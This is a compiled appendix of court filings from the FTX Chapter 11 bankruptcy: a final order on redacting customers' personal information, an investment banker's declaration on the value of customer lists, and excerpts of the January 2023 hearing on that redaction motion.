6.      The rights of the Debtors, the Official Committee of Unsecured Creditors, and all other parties in interest to seek an extension of the Redaction Deadline, or to request authorization to redact any personal information of customers, creditors or equity holders on any other grounds, are reserved.

7.      For the absence of doubt, the Debtors shall file an unredacted creditor matrix under seal with the Court.

8.      Notwithstanding anything to the contrary in the order relating to the retention of a claims agent, or any Local Rules or Bankruptcy Rules, the Claims and Noticing Agent is authorized, on a final basis, to (a) suppress from the Claims Register (i) the names,

addresses and e-mail addresses of the Debtors' customers until the Redaction Deadline, (ii) the names, addresses and e-mail addresses of any other individual creditors or individual equity holders who are citizens of the United Kingdom or any European Union member country and (iii) the addresses and e-mail addresses of the Debtors' customers (following the Redaction Deadline), other individual creditors or individual equity holders, (b) file affidavits of service redacting the (i) the names, addresses and e-mail addresses of the Debtors' customers until the Redaction Deadline, (ii) the names, addresses and e-mail addresses of any other individual creditors or individual equity holders who are citizens of the United Kingdom or any European Union member country and (iii) the addresses and e-mail addresses of the Debtors' customers (following the Redaction Deadline), other individual creditors or individual equity holders, and (c) withhold publication of proofs of claims filed by customers until the Redaction Deadline, *provided* that the Claims and Noticing Agent shall serve the Debtors' customers and creditors at their actual addresses and e-mail addresses, as necessary.

9. The Debtors shall provide an unredacted Creditor Matrix, unredacted Consolidated Top 50 Creditor List, unredacted Schedules and Statements, an unredacted Claims Register, unredacted affidavits of service, withheld proofs of claim, and any other filings redacted pursuant to this Final Order, to (a) upon request, the U.S. Trustee, the U.S. Department of Justice, counsel to the U.S. Securities and Exchange Commission, counsel to state governmental agencies of the State of Texas, and any trustee, examiner and official committee appointed in these Chapter 11 Cases and (b) upon further order of the Court, any other party.

10. Upon request of a party in interest, the Court may, upon a showing of good cause, release some or all of the information that is being redacted pursuant to the authority granted by this Final Order. All parties' rights in this regard are reserved.

A0130

11.     To the extent a party in interest files a document on the docket in these Chapter 11 Cases that is required to be served on creditors whose information is under seal pursuant to this Final Order, such party in interest should contact counsel for the Debtors who shall work in good faith, with the assistance of their Claims and Noticing Agent, to effectuate the service on such party's behalf.

12.     Nothing in this Final Order prohibits any customer, creditor or equity holder from voluntarily identifying itself in connection with these Chapter 11 Cases.  In addition, nothing in this Final Order exempts any customer, creditor or equity holder from compliance with Rule 2019 of the Federal Rules of Bankruptcy Procedure.

13.     The Debtors are authorized and empowered to execute and deliver such documents, and to take and perform all actions necessary to implement and effectuate the relief granted in this Final Order.

14.     This Court shall retain jurisdiction with respect to any matters, claims, rights or disputes arising from or related to the Motion or the implementation of this Final Order.

Dated: _____
            Wilmington, Delaware

_____
The Honorable John T. Dorsey
United States Bankruptcy Judge

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |

## DECLARATION OF KEVIN M. COFSKY IN SUPPORT OF DEBTORS' MOTION FOR ENTRY OF AN ORDER AUTHORIZING DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION

I, Kevin M. Cofsky, hereby declare under penalty of perjury:

1.      I am a Partner in the Advisory Group at Perella Weinberg Partners L.P. ("PWP"), a financial advisory firm that maintains an office at 767 5th Avenue, New York, New York 10153, and the Debtors' proposed investment banker. PWP is a full-service investment banking firm providing strategic and financial advisory services, including with respect to mergers and acquisitions, capital raising and restructuring transactions across a broad range of industries. PWP and its senior professionals have extensive experience with respect to the reorganization and restructuring of distressed companies, both out of court and in Chapter 11 proceedings.

2.      I have been employed by PWP since January 2007 and have been a Partner of PWP since December 2015. I received a Bachelor of Science degree in Economics with a concentration in Finance from the Wharton School of Business at the University of

---

[1]     The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

Pennsylvania, a Juris Doctor from the University of Pennsylvania Law School and a Masters of Government Administration from the Fels Center of Government at the University of Pennsylvania.

3.      I started my career in investment banking as an Analyst with Houlihan Lokey Howard & Zukin.  Thereafter, I was an Associate with The Beacon Group and, prior to joining PWP, I was a Managing Director with Evercore Partners in its Capital Structure Advisory and Restructuring group.  I have also clerked for Chief Justice Portiz in the New Jersey Supreme Court and was an associate with Cravath, Swaine and Moore.

4.      In addition to working with the Debtors in the above-captioned cases (the "Chapter 11 Cases"), my restructuring and financial advisory engagements have included representations of debtors and creditors in the following chapter 11 cases:  *In re PG&E Corp.*, No. 19-30088 (Bankr. N.D. Cal.); *In re Energy Future Holdings Corp.*, No. 14-10979 (Bankr. D. Del.); *In re R.E. Gas Development, LLC*, No. 18-22032 (Bankr. W.D. Pa.*); In re Bonanza Creek Energy, Inc.*, No. 17-10015 (Bankr. D. Del.); *In re Memorial Production Partners LP*, No. 17-30262 (Bankr. S.D. Tex.); *In re EV Energy Partners, L.P.*, No. 18-10814 (Bankr. D. Del.); *In re Atlas Resource Partners, L.P.*, No. 16-12149 (Bankr. S.D.N.Y.); and *In re Edison Mission Energy*, No. 12-49219 (Bankr. N.D. Ill.).

5.      I submit this declaration (this "Declaration") in support of the Debtors obtaining final relief with respect to the *Motion of Debtors for Entry of Interim and Final Orders (i) Authorizing the Debtors to Maintain a Consolidated List of Creditors In Lieu of Submitting a Separate Matrix for Each Debtor, (ii) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (iii) Granting Certain Related Relief*.  I am not being compensated separately for this testimony other

than through payments received by PWP as the investment banker proposed to be retained by the Debtors. Except as otherwise indicated herein, all of the facts set forth in this Declaration are based upon my personal knowledge, my review of relevant documents, information provided to me by PWP professionals involved in advising the Debtors in these Chapter 11 Cases or information provided to me by the Debtors. If called upon to testify, I could and would testify to the facts set forth herein on that basis. I am authorized to submit this Declaration on behalf of the Debtors.

6. The Debtors, with the assistance of PWP, have commenced an extensive outreach effort as part of marketing the Debtors' businesses and assets for potential sale. While these Chapter 11 Cases are in their early stages, I anticipate that the sale of businesses and assets are a potential source of significant value for the Debtors' estates.

7. The lists of the Debtors' customers, including both names and contact information, are a key asset of the Debtors. A hallmark feature of cryptocurrency is a holder's ability to remain anonymous to the public. There is limited to no publicly available information as to the identity of individuals or institutions holding cryptocurrency on exchanges. I understand that it is therefore expensive and time consuming for companies that operate crypto asset management platforms to identify potential customers, attract and enroll them, and ultimately establish them as customers. It is likewise generally difficult for a crypto asset management platform to identify customers on a competitor's platform and seek to poach those customers.

8. My understanding is that the Debtors have more than 9 million aggregate customers for whom the Debtors have valuable and sensitive personal identifying information. The Debtors have expended significant resources to build the customer base over time, and I

3

believe third parties will attribute value to those lists.  For those reasons, I believe the Debtors'
customer lists, including names and contact information for individual and institutional
customers, are an important asset of the Debtors and a potential source of value for the Debtors'
estates.

        9.      Further, except for individual customers with the most common or generic
names, I believe that the names of the Debtors' customers are themselves valuable because a
competitor could identify who such customers are and how to contact them through internet
searches or otherwise.  This is likewise true for institutional customers, who would be easily
identifiable by name alone.  I do not believe that it would be difficult to look up and, in the case
of the Debtors' competitors, poach the Debtors' customers if their names were to be made
public.  The publication of this information will substantially harm the value of the Debtors'
assets and undermine the Debtors' ability to obtain the highest and best value for their assets.

        10.      Crypto asset management platforms, and businesses in general, regularly
expend significant value for new customers in the ordinary course of business.  In fact, leading
cryptocurrency exchanges that competed with the Debtors, including Binance, Coinbase, Kraken
and KuCoin, all maintain a referral and/or affiliate program to incentivize members to market the
respective platform to new users.  Binance offers affiliate partners "*up to 50% of commissions*;"[2]
Coinbase offers the referrer and user referred each a bonus varying "from time to time and by
country";[3] Kraken's affiliate program offers "*20% of the trading fees collected from clients [the
customer] refer[s] . . . for the lifetime of the client with Kraken*;"[4] and KuCoin offers "*up to 50%*

---

[2]    BINANCE, https://www.binance.com/en/activity/affiliate (last visited Jan. 6, 2023).

[3]    *The Coinbase Referral Program*, COINBASE, https://help.coinbase.com/en/coinbase/other-topics/other/the-coinbase-referral-program (last visited Jan. 6, 2023).

*of . . . trading fees as a commission*" in its own affiliate program.[5]

11.     I believe the fact that companies regularly pay commissions and fees for a referral to a new user is evidence that the identity of a new customer is inherently valuable. Further, the fact that businesses in the ordinary course go to great lengths to protect the identity of their customers is common knowledge, and demonstrative of the fact that the identity of customers is a very important value component to most businesses.  Notably, if one of the cryptocurrency exchanges above obtained fulsome lists of high-target potential customers containing names and contact information, the desire to pay for a referral to those customers would greatly diminish, since the potential customer is now known.  Similarly, potential buyers of the Debtors' assets will likely ascribe material value to the Debtors' customer lists.  If customer information is made public, I believe the value of the Debtors' businesses, and the ability to realize that value, could be materially harmed, diminished or dissipated.

12.     Additionally, it is well established that customer information such as names and contact information are separately valued intangible assets of an entity.  The accounting standard-setting body, the *Financial Accounting Standards Board* (FASB), provides guidance related to the recognition of different categories of customer-related intangible assets acquired in a business combination in Accounting Standard Codification (ASC) 805.  The guidance in ASC 805-20-25-31 states:  "Customer-related intangible assets that would meet that criterion for recognition under this accounting alternative are those that are capable of being sold or licensed independently from the other assets of a business. . . .  **Customer-related intangible assets that may meet that criterion for recognition include but are not limited to: . . .**

---

[4]     *Kraken Affiliate Program*, KRAKEN, https://support.kraken.com/hc/en-us/articles/360027545252-Kraken-Affiliate-program (last visited Jan. 6, 2023).

[5]     KUCOIN, https://www.kucoin.com/affiliate (last visited Jan. 6, 2023).

**A0136**

**Customer information (for example, names and contact information)."**[6] The idea that a customer list is a separable asset with inherent and potentially significant value is further supported in financial valuation literature. Notably, a customer list's value is suggested to be diminished the moment part or all of this information is disclosed. Valuation expert Jeffrey Cohen says in *Intangible Assets: Valuation and Economic Benefit*: "Trade secrets are types of assets that result from a proprietary technology or way of doing business. Generally speaking, they exist because they provide some competitive advantage. . . . **A customer list . . . might qualify as trade secrets**, **provided that there is value in the fact they remain unknown to the competition**—that is, that **they provide independent economic value**, and that there is some evidence that their owners actually try to keep them secret."[7] The Debtors have indeed sought to keep their customer lists private.

13.     These Chapter 11 Cases are in the early stages. A key focus of the Debtors is to maximize the value of the estates by preserving asset value where possible and pursuing the sale of certain assets to obtain highest and best value. I believe an important component of that strategy is maintaining the confidentiality of customers' identities and personal identifying information. Disclosing those customer lists would therefore jeopardize the Debtors' ability to maximize value.

---

[6]     FASB ASC 805-20-25-31, *available at* https://asc.fasb.org/1943274/2147480013/805-20-25-31 (last visited Jan. 6, 2023) (emphasis added).

[7]     JEFFREY A. COHEN, INTANGIBLE ASSETS: VALUATION AND ECONOMIC BENEFIT 17 (2005) (emphasis added).

6

**A0137**

Pursuant to 28 U.S.C. § 1746, I declare under penalty of perjury that the foregoing statements are true and correct to the best of my knowledge, information and belief.

Dated: January 8, 2023

/s/ Kevin M. Cofsky
_____
Kevin M. Cofsky
Perella Weinberg Partners
Partner

4860-5286-0226 v.7

**A0138**

```
 1                   UNITED STATES BANKRUPTCY COURT
                          DISTRICT OF DELAWARE
 2

 3   IN RE:                         .  Chapter 11
                                    .  Case No. 22-11068 (JTD)
 4   FTX TRADING LTD., et al.,      .
                                    .
 5                                  .  Courtroom No. 5
                                    .  824 Market Street
 6             Debtors.             .  Wilmington, Delaware 19801
                                    .
 7                                  .  Wednesday, January 11, 2023
     . . . . . . . . . . . . . . .  .  9:00 a.m.
 8
                            TRANSCRIPT OF HEARING
 9             BEFORE THE HONORABLE JOHN T. DORSEY
               CHIEF UNITED STATES BANKRUPTCY JUDGE
10
     APPEARANCES:
11
     For the Debtor:           Adam Landis, Esquire
12                             LANDIS RATH & COBB LLP
                               919 Market Street, Suite 1800
13                             Wilmington, Delaware 19801

14                             Andrew G. Dietderich, Esquire
                               James L. Bromley, Esquire
15                             Brian D. Glueckstein, Esquire
                               Alexa J. Kranzley, Esquire
16                             SULLIVAN & CROMWELL LLP
                               125 Broad Street
17                             New York, NY 10004

18

19   (APPEARANCES CONTINUED)

20   Audio Operator:           Jermaine Cooper

21   Transcription Company:    Reliable
                               The Nemours Building
22                             1007 N. Orange Street, Suite 110
                               Wilmington, Delaware 19801
23                             Telephone: (302)654-8080
                               Email:  gmatthews@reliable-co.com
24
     Proceedings recorded by electronic sound recording,
25   transcript produced by transcription service.
```

```
 1   APPEARANCES (CONTINUED):

 2   For the U.S. Trustee:     Juliet Sarkessian, Esquire
                               OFFICE OF THE UNITED STATES TRUSTEE
 3                             844 King Street, Suite 2207
                               Lockbox 35
 4                             Wilmington, Delaware 19801

 5   For the Movants:          David Finger, Esquire
                               FINGER & SLANINA, LLC
 6                             1201 North Orange Street
                               Wilmington, Delaware 19801
 7
     For the Committee:        Kris Hansen, Esquire
 8                             Erez Gilad, Esquire
                               PAUL HASTINGS LLP
 9                             MetLife Building
                               200 Park Avenue
10                             New York, New York 10166

11   For the Ad Hoc
     Committee of Non-US
12   Customers:                Matthew Harvey, Esquire
                               MORRIS, NICHOLS, ARSHT & TUNNELL LLP
13                             1201 North Market Street
                               Suite 1600
14                             Wilmington, Delaware 19801

15   For Paradigm
     Operations:               Sidney Levinson, Esquire
16                             DEBEVOISE & PLIMPTON LLP
                               919 3rd Avenue
17                             New York, New York 10022

18

19

20

21

22

23

24

25
```

**A0140**

1               <u>INDEX</u>

2    <u>MOTIONS:</u>                                                    <u>PAGE</u>

3    Agenda
4    Item 20:  Motion of Debtors for Entry of Interim and          16
                Final Orders (I) Authorizing the Debtors to
5               Maintain a Consolidated List of Creditors in
                Lieu of Submitting a Separate Matrix for Each
6               Debtor, (II) Authorizing the Debtors to Redact
                Or Withhold Certain Confidential Information
7               Of Customers and Personal Information of
                Individuals And (III) Granting Certain Related
8               Relief [D.I. 45; Filed 11/19/22]

9
                Court's Ruling:                                    102
10
     Agenda
11   Item 22:  Motion for Entry of Interim and Final Orders        109
                (A) Authorizing the Debtors, in Their Sole
12              Discretion, to Provide Indemnification and
                Exculpation to Certain Individuals, (B)
13              Authorizing Certain Actions Pursuant to Section
                363 of the Bankruptcy Code, and (C) Granting
14              Certain Related Relief
                [D.I. 94; Filed 11/22/22]
15
                Court's Ruling:                                    113
16
     Agenda
17   Item 21:  Motion of Debtors for Entry of Interim and Final    113
                Orders (I) Authorizing the Debtors to (A)
18              Operate a Post-Petition Cash Management System,
                (B) Maintain Existing Business Forms, and (C)
19              Perform Intercompany Transactions, (II) Granting
                A partial Waiver of the Deposit Guidelines Set
20              Forth in Section 345(b), and (III) Granting
                Related Relief
21              [D.I. 47; Filed 11/19/22]

22
                Court's Ruling:                                    139
23

24

25

1  customers on the exchange without permission.  Mr. Wang

2  created this backdoor by inserting a single number into

3  millions of lines of code for the exchange, creating a line

4  of credit from customers to Alameda, to which customers did

5  not consent.  And we know the size of that line of credit, it

6  was $65 billion.

7       We know what Alameda did with the money.  It bought

8  planes, houses, threw parties, made political donations.  It

9  made personal loans to its founders.  It sponsored the FTX

10  Arena in Miami, a Formula One team, the League of Legends,

11  Cochella, and many other businesses, events, and

12  personalities.

13       It gambled on cryptocurrency investments, often

14  unsuccessfully.  And it made debt and equity investments in

15  diverse businesses, many at prices that greatly exceeded

16  market value at the time of the investment.

17       We know that all this has left a shortfall in value

18  to repay customers and creditors.  The amount of the

19  shortfall is not yet clear.  It will depend on the size of

20  the claims pool and our recovery efforts.  But every week, we

21  come closer to completing the work necessary to estimate

22  recoveries for the purposes of a plan of reorganization.

23       We also have begun to engage on the central legal

24  issues in the case.  These include the nature of customer

25  entitlements, are they property or claims, and how to close

 1 │ out derivatives to calculate petition date claim amounts.

 2 │          Finally, we have established great working

 3 │ relationships with the U.S. Trustee, our new Official

 4 │ Committee of Creditors -- welcome -- and regulatory

 5 │ stakeholders around the world.  Many people and many

 6 │ institutions have worked hard to get us here today.  Chapter

 7 │ 11 is a fish bowl and we welcome that, in this case more than

 8 │ most.

 9 │          And as a result of the effort by so many, we stand

10 │ before you with only limited open issue on our second-day

11 │ relief.  This is despite the volume and the unique nature of

12 │ many of the issues everyone has faced together.

13 │          Unless you have questions for me, Your Honor, I

14 │ propose we move directly to the agenda.  As Mr. Landis

15 │ mentioned, it is an extremely long agenda, but it is mostly

16 │ matters that have either been adjourned or reflected in

17 │ orders that have been either entered or in agreed form.

18 │          For our point today, Your Honor -- maybe -- I'll

19 │ cede -- also, Mr. Hansen is raising his hand.  I'll cede the

20 │ podium to him, if he would like to make some preliminary

21 │ remarks.

22 │          THE COURT:  Okay.  Thank you.

23 │          Mr. Hansen.

24 │          MR. HANSEN:  Good morning, Your Honor.  Kris Hansen

25 │ with Paul Hastings, proposed counsel to the official

**A0143**

1    committee.  Just quick introductions.  My partners Erez Gilad

2    and Gabe Sasson are here with me today, as are Mr. Lunn and

3    Mr. Poppiti, with our proposed co-counsel at Young Conaway.

4         The committee has also selected FTI Consulting as

5    it's financial advisor and Jefferies as its investment

6    banker.

7         Your Honor, the committee worked very hard behind

8    the scenes with the debtors and the United States Trustee to

9    try to make this hearing as consensual as it could be, and we

10   appreciate the willingness of both parties to approach the

11   motions on for today in a constructive manner.

12        With this being the committee's first formal

13   appearance before the Court since its formation, I wanted to

14   just take a moment to share a little bit of information about

15   the committee and provide the Court with the committee's

16   perspective on the cases at this time, if that would be okay.

17        THE COURT:  That's fine.  Thank you.

18        MR. HANSEN:  Thank you, Your Honor.

19        Your Honor, first, the committee is comprised of

20   nine members, including three individuals and six entities

21   from eight different jurisdictions, spanning from Singapore

22   to California.  The committee members have broad exposure

23   across the FTX exchange platforms and, sadly, share the

24   moniker of "victim" with the millions of other customers who

25   were defrauded by FTX.

**A0144**

 1  And in general, our mandate is to explore different potential

 2  avenues to maximize the value of the debtors' assets through

 3  this process.

 4  Q    In your experience, Mr. Cofsky, have -- prior to this

 5  case, have you been involved in situations where the

 6  monetization of businesses includes the monetization of

 7  things such as customer assets or customer lists?

 8  A    Yes, I have been.

 9  Q    Can you elaborate on that at all, in terms of the types

10  of work you've done in that area?

11  A    Yes.  Most recently, we've been involved in the Celsius

12  bankruptcy case, pursuant to which the customer -- the value

13  and the potential value of the customers has been at issue.

14  But we've also seen -- while we are not running the sale

15  process, we have been evaluating that.  And we appreciate the

16  extent to which potential acquirers of that business have

17  evaluated the value of the customers and their various

18  positions on that platform.

19  Q    Are there other examples that you can recall where the

20  question of customer assets or customer lists have been at

21  issue in transactions that you or your team have been

22  involved in, in the past?

23  A    Yes.  The -- the identity and value of customers are

24  often considered to be quite valuable in the context of

25  retail businesses, consumer-facing businesses --

**A0145**

 1               MS. SARKESSIAN:  Your Honor, I'm going to object.

 2               THE COURT:  Basis?

 3               MS. SARKESSIAN:  I think he's testifying about what

 4    potential buyers look for, and he does not have personal

 5    knowledge about that.

 6               THE COURT:  Well, he's an investment banker.  He

 7    buys and sells companies, right?

 8               MS. SARKESSIAN:  I think, Your Honor, if he could

 9    be more specific about the basis of that knowledge and

10    exactly who he's talking about.

11               THE COURT:  Well, is that a foundation for his

12    knowledge, Mr. Glueckstein?

13    BY MR. GLUECKSTEIN:

14    Q    Mr. Cofsky, can you back up a half-step and explain to

15    the Court your role in your transactions that you can recall

16    that have involved customer assets in the past?

17    A    Yes.  I want to try to be specific because this is a

18    unique situation.  And I would refer most specifically to, in

19    my declaration, I think, the other exchanges the other crypto

20    companies and the extent to which they clearly have indicated

21    that they value the identity of customers.  And they have --

22    all of the other crypto companies that we have evaluated have

23    programs in place to compensate for the provision of that

24    information.

25          We have also been a party to situations, as I indicated,

 1   most recently in the Celsius case, where we have seen that

 2   bids have explicitly provided incremental value for each

 3   customer that is acquired.

 4   Q    Have you, Mr. Cofsky, considered as part of your work as

 5   proposed investment banker in this case the debtors' customer

 6   list that they have available to them here?

 7   A    I'm sorry.  Can you repeat that question, please?

 8   Q    In the context of -- in the context of the work that

 9   you've done -- that you're doing as the debtors' proposed

10   investment banker in this case, have you considered the

11   debtors' customer list as part of the strategic review that

12   you've undertaken?

13   A    Yes, we have.

14   Q    With respect to the ongoing strategic review, have you,

15   as the debtors' investment banker, formed a view as to

16   whether there is value in the debtors' customer list?

17   A    Yes, we have, and we do believe that there's value in

18   those assets.

19   Q    And can you explain for the Court the basis for that

20   conclusion?

21   A    Yes.  We believe that, whether the exchanges are

22   reorganized or whether they are sold in connection with our

23   process, both the exchanges that we're currently marketing,

24   as well as the core business that we're currently evaluating,

25   we believe that the value of the business is maintained and

**A0147**

1  maximized by ensuring that competitors are not able to

2  solicit those customers and onboard them onto their platforms

3  in a manner which would result in a reduction in the value of

4  the estate.

5      So, for example, if other businesses that compete with

6  FTX had the identity and were able to locate these customers,

7  solicit them, put them on their platform while FTX is in

8  bankruptcy and not currently operating in the ordinary

9  course, that would reduce the value of the estate.

10      Whether the estate, ultimately, is able to reorganize

11  its core business or whether third parties are evaluating the

12  acquisition of those exchanges, they will place, in our view,

13  a greater value on those exchanges if all of the customers

14  are maintained on that platform and have not found another

15  exchange on which to transact.

16  Q   Mr. Cofsky, with respect to -- we've been talking about

17  the customer information, do you view it important to

18  maintain, during your strategic review process, the anonymity

19  of both names, in addition to contact information, or are

20  contact information alone sufficient?

21  A   We -- it's a very good question and we -- we looked into

22  that.  We -- we reviewed the customer lists.  There are a

23  number of -- excuse me -- customers whose names are unique.

24  And we were able to, very quickly, locate them through

25  searches on social media, as well as other professional

1  relationship databases.  And we came to the conclusion that

2  it would be quite easy to locate, identify, and contact those

3  customers, even starting with only the customer names.  And

4  that relates to individuals, as well as businesses.

5  Q    Mr. Cofsky, if you could look at the declaration that

6  you submitted in this case that's in front of you.

7  A    Yes, I have it.

8  Q    And it's filed at Docket Number 411, entitled:

9         "Declaration of Kevin M. Cofsky in Support of the

10 Debtors' Motion for Entry of an Order Authorizing the Debtors

11 to Redact or Withhold Certain Customer Information."

12      Mr. Cofsky, were you involved in preparing the

13 declaration that was submitted to the Court at Docket Number

14 411?

15 A    I was.

16 Q    And do you believe, to the best of your knowledge, that

17 the information presented in that -- in your declaration

18 reflects your views, again, to the best of your knowledge?

19 A    Yes, I do.

20 Q    Okay.  If you can go to Paragraph 12 of your

21 declaration.  You state in the first sentence there:

22        "Additionally, it is well established that customer

23 information such as names and contact information are

24 separately valued intangible assets of an entity."

25      Do you see that?

1  A    I do.

2  Q    Can you explain to the Court the basis for the

3  statements that you made there in Paragraph 12 and beyond

4  that sentence in Paragraph 12?

5  A    Yes.  I'd answer that in a number of ways:

6       First, as indicated further in this particular

7  paragraph, in the context of a "business combination," as

8  that's designed by Accounting Standard Codification 805,

9  intangible assets are valued and allocated in a certain

10 manner, and customer-related assets, customer lists are a

11 component of that.  We thought that that was significant.

12      I also indicated in the paragraph, having reviewed some

13 academic literature, the -- in particular, the book by

14 Jeffrey Cohen, Intangible Assets:  Valuation and Economic

15 Benefit, again, the value ascribed to customer lists,

16 particularly the economic value that is indicated

17 particularly by instances where companies choose to keep that

18 information secret, to the extent that they can.

19      In addition, as I had indicated in the prior paragraphs,

20 it was very relevant, in our view, significant as we

21 evaluated this particular situation and the landscape -- the

22 competitive landscape within which this company operates,

23 that all of its competitors value this information.  This is

24 a new and expanding field.  And it's not entirely clear to

25 businesses that are seeking to expand their asset base and

1   their customer list exactly who they should be targeting.

2       And so all of the competitors that we looked at

3   indicated that they provide economic -- that they ascribe

4   economic value to these customers.  And the indication, the

5   evidence of that was -- I won't read through the words on the

6   page, but Binance and Coinbase and Kraken and Kucoin all

7   provide financial incentives for the referral of customers

8   and the retention of customers.

9       We also reviewed the bids that had been submitted in the

10  Voyager case and in the Celsius case and took note of the

11  fact that, not only were customer assets and lists being

12  acquired in -- and a value ascribed to the business itself,

13  but that there were actually incremental elements of value

14  which would be allocated to each customer that went onto the

15  acquirers platform.  And in the initial case of the prior bid

16  from FTX to Voyager, to the extent that customers maintained

17  their accounts on the platform for a period of time, they

18  would -- they would receive incremental value.  And so there

19  was specific value acscribed to each customer -- the name,

20  the identity, the assets -- as they moved onto the platform

21  of the buyer.

22  Q    Thank you.

23      With respect, Mr. Cofsky, if you look at Paragraph 13 of

24  your declaration, the last paragraph there.

25  A    Yes.

**A0151**

1   Q      You wrote in the declaration in the last sentence:

2          "I believe an important component of that strategy

3   is maintaining the confidentiality of customers' identities

4   and personal identifying information."

5      And then you end by saying:

6          "Disclosing those customer lists would therefore

7   jeopardize the debtors' ability to maximize value."

8      Do you see that there?

9   A   I do.

10  Q   Do you stand by that testimony this morning?

11  A   I do.

12  Q   And can you elaborate for the Court your view as to why

13  disclosing the customer lists would jeopardize the abilitiy

14  to maximize value?

15  A   Yes.  As I indicated, whether we reorganize, are able to

16  reorganize the businesses, or whether there will be an

17  acquisition of the core business and the other exchanges, we

18  believe that the business itself is comprised of a number of

19  components, and a significant component of the business is

20  the customers themselves.

21     The customer assets are obviously important.  But what

22  the customers choose to do going forward will be a

23  significant driver of value.  And we think that third parties

24  will place significant value on that in a sale process.  So,

25  to the extent that those customer lists, the identity of the

1  customers are able to be maintained without broad disclosure,

2  that will give buyers confidence that what they are buying is

3  actually of value, and that they alone will be able to

4  maximize the value of putting those customers onto their

5  platform.

6      I think the same logic holds for a reorganized entity.

7  To the extent that the exchange is able to be rehabilitated

8  and reorganized, it will, in our view, have more value if

9  those customers have not been poached and are -- by

10  competitors, and are, therefore, not transacting on another

11  exchange.

12  Q   Mr. Cofsky, Paragraph 6 of your declaration you

13  submitted to the Court, if you'd turn there.  It says -- you

14  write in the first sentence:

15          "The debtors, with the assistance of PWP, have

16  commenced an extensive outreach effort as part of marketing

17  the debtors; businesses and assets for potential sale."

18      Do you see that?

19  A   Yes, I do.

20  Q   And that sentence is accurate --

21  A   Yes.

22  Q   -- correct?

23  A   Yes, that's correct.

24  Q   Do you have any sense, at this time, how long the

25  process of outreach and monetization of assets and

**A0153**

1  just the creditor matrix or the customer lists, but also any

2  reference to any customer or creditor in any other filing in

3  the court.  And I'm assuming you're not proposing to do that

4  if that particular customer has already self-identified.

5          MR. GLUECKSTEIN:  We have not, Your Honor, and

6  that's another issue that Ms. Sarkessian raised, right, this

7  idea that there are customers who want to go to competitors

8  or want to move their accounts, which, of course, we

9  understand.  And they're not in the position, certainly, to

10  take their account at FTX at this point because of the

11  Chapter 11 process, but they're certainly free to go to a

12  competitor, self-identify themselves to a competitor, and

13  open an account somewhere else if they haven't already.

14          And, of course, we did as this issue some at the

15  first day hearing, any creditor or customer is free to come

16  forward and participate in this case, identify themselves

17  publicly, identify themselves in the docket of this court.

18  The documents -- and we have, of course, no issue with that

19  and wouldn't seek to restrict that -- from the perspective of

20  the documents that Ms. Sarkessian was reflecting -- was

21  commenting on this morning, the creditor matrix, the top-50

22  list, the SOFAs, the schedules, these are all documents that

23  we are required to file, right.  Those are documents the

24  debtors are required to compile and provide and would result

25  in us affirmatively, with or without their consent, as part

1  of the bankruptcy process, and we understand there are

2  obligations of the bankruptcy process, to identify the names

3  of those customers.

4          Ms. Sarkessian referenced the idea, well, nobody

5  would know.  You have all these names.  It's a creditor list.

6  It's not a customer list.

7          Our top-50 list, even the redacted versions that

8  are on file publicly, do delineate between customers and non-

9  customer creditors -- trade creditors and customers.  And so,

10  that information, if it were to be unredacted today, people

11  could see very easily of the top-50 creditors, which of those

12  are customers, meaning customers who hold accounts on the

13  various exchanges at FTX.

14          So, the distinction that Your Honor references, we

15  agree with.  Obviously, there's nothing in what Your Honor

16  would be ordering that would prevent any party from self-

17  identifying if they so choose.

18          THE COURT:  So, is there a -- excuse me -- a way

19  to delineate between -- you refer to the top-50 creditor

20  list.  That's been sealed in its entirety or redacted in its

21  entirety, right?

22          MR. GLUECKSTEIN:  It has not been redacted in its

23  entirety, Your Honor.  It has been filed in a redacted form

24  that redacts the information that we asked, and that the

25  Court authorized, pursuant to the interim order.  So, we have

1    redacted names and addresses of individuals and of

2    institutions who are customers, pursuant to the Court's

3    interim order and it's reflected as such.  But those

4    documents are on file in redacted form under seal.

5            THE COURT:  So, what I'm trying to get at is, is

6    there a way to delineate on the creditor lists, between who

7    is a creditor, who is a customer, and who is both, and be

8    able to disclose those who are solely creditors, publicly,

9    without disclosing those who are customers and creditors?

10           MR. GLUECKSTEIN:  You know, it goes to the

11   question, it's a question of what information for the full

12   nine million, of whether that's a meaningful field that

13   exists or that would have to be kind of independently

14   reviewed and populated, and I'm not sure of the answer to

15   that, Your Honor.  We'd have to look into that.

16           I think the number, from a volume perspective, is

17   very small, comparative -- in relative comparison to the

18   customers.  What we've been talking about here, by and large,

19   and why we've been seeking to protect, when we talk about the

20   customer list, the customers at the main debtors, at the

21   exchanges, are where the volume is and that's where we

22   believe the value is, and that's what Mr. Cofsky testified

23   about this morning.

24           So, you know, that does implicate, of course,

25   the 107(c) issues, which we are not pressing today.  But I

1  think, you know, we would have to see -- honestly, Your

2  Honor, we would have to see whether we could make that

3  delineation for all, kind of non-customer creditors.  I

4  suspect that we could, but I think that would take some work,

5  but I suspect that we could.

6       THE COURT:  Well, in the top-50 lists --

7       MR. GLUECKSTEIN:  Certainly, in the top-50 lists,

8  we have that information.

9       THE COURT:  -- are there those who now have been

10 disclosed, who are solely creditors, not customers?

11      MR. GLUECKSTEIN:  Not by name, Your Honor, because

12 the interim order had the 107(c) relief in it.

13      THE COURT:  Okay.

14      MR. GLUECKSTEIN:  So, at this point, all of the

15 names are redacted from that customer list that are subject

16 to the interim order.  So, the relief that we asked for in

17 the interim order, because it did include the 107(c) relief,

18 is broader than what we're talking about now.

19      THE COURT:  Okay.

20      MR. GLUECKSTEIN:  You know, I think on the GDPR

21 issues, Your Honor, those are certainly secondary here.  We

22 do think it's relevant.  We did brief the appropriate

23 sections.  You know, absent questions, we're happy to stand

24 on the briefing on that issue and, otherwise, I'm happy to

25 answer any other questions that the Court may have.

**A0157**

1          THE COURT:  Thank you, no questions.

